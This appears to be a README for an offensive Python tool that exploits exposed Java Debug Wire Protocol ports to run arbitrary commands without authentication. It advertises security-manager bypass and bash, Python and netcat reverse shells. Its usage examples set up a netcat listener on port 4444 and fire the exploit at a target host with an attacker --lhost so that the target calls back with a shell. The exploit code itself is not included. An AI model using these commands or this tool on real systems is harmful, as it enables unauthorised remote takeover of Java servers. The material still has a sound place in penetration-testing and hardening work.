Share
## https://sploitus.com/exploit?id=76B375BE-C7D4-5EAF-AC06-91A22DB4C0B3
## **JDWP Remote Code Execution Exploit**

*A Python 3 implementation of the Java Debug Wire Protocol (JDWP) remote code execution exploit. This tool exploits exposed JDWP services to execute arbitrary code remotely without authentication.*

### **Overview**

*The Java Debug Wire Protocol (JDWP) is a communication protocol used for debugging Java applications. When enabled, it allows debuggers to connect to a running Java Virtual Machine (JVM) to inspect and control the execution of Java programs.*

### **Features**

- **Remote Code Execution**: Execute arbitrary commands on the target system
- **Multiple Payload Types**: Support for bash, Python, and netcat reverse shells
- **OS Fingerprinting**: Automatically detect the target operating system
- **Security Manager Bypass**: Automatically disable Java security manager if present
- **Robust Error Handling**: Includes retry mechanisms and comprehensive error handling
- **Configurable Options**: Flexible configuration for various attack scenarios

### **Usage**

### **Basic Usage**

```bash
python3 jdwp_exploit.py 
```

### **Advanced Usage**

```bash
python3 jdwp_exploit.py  [options]
```

### **Command Line Options**

| Option | Description | Default |
|--------|-------------|---------|
| `target` | Target host (required) | - |
| `-p, --port` | Target JDWP port | 8000 |
| `-t, --timeout` | Socket timeout in seconds | 10 |
| `-r, --retries` | Number of retries when waiting for events | 10 |
| `--lhost` | Local host for reverse shell | 127.0.0.1 |
| `--lport` | Local port for reverse shell | 4444 |
| `--payload-type` | Type of reverse shell payload | bash |
| `--payload` | Custom payload file path | - |

### **Payload Types**

- **bash**: Bash reverse shell using `/dev/tcp`
- **python**: Python reverse shell
- **nc**: Netcat reverse shell

### **Examples**

### **Exploitation**

```bash
# Basic exploit against default JDWP port
python3 jdwp_exploit.py 192.168.1.100

# Exploit with custom port
python3 jdwp_exploit.py 192.168.1.100 -p 8001
```

### **Reverse Shell**

```bash
# Set up listener first
nc -nlvp 4444

# Execute exploit
python3 jdwp_exploit.py 192.168.1.100 --lhost 192.168.1.50 --lport 4444

# Use Python reverse shell
python3 jdwp_exploit.py 192.168.1.100 --payload-type python --lhost 192.168.1.50 --lport 4444

# Use custom payload
python3 jdwp_exploit.py 192.168.1.100 --payload ./custom_payload.sh
```

### **References**

- [Java Debug Wire Protocol Specification](https://docs.oracle.com/javase/8/docs/technotes/guides/jpda/jdwp-spec.html)
- [JDWP Security Considerations](https://docs.oracle.com/javase/8/docs/technotes/guides/jpda/conninv.html#security)
- [Metasploit JDWP Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_jdwp_debugger.rb)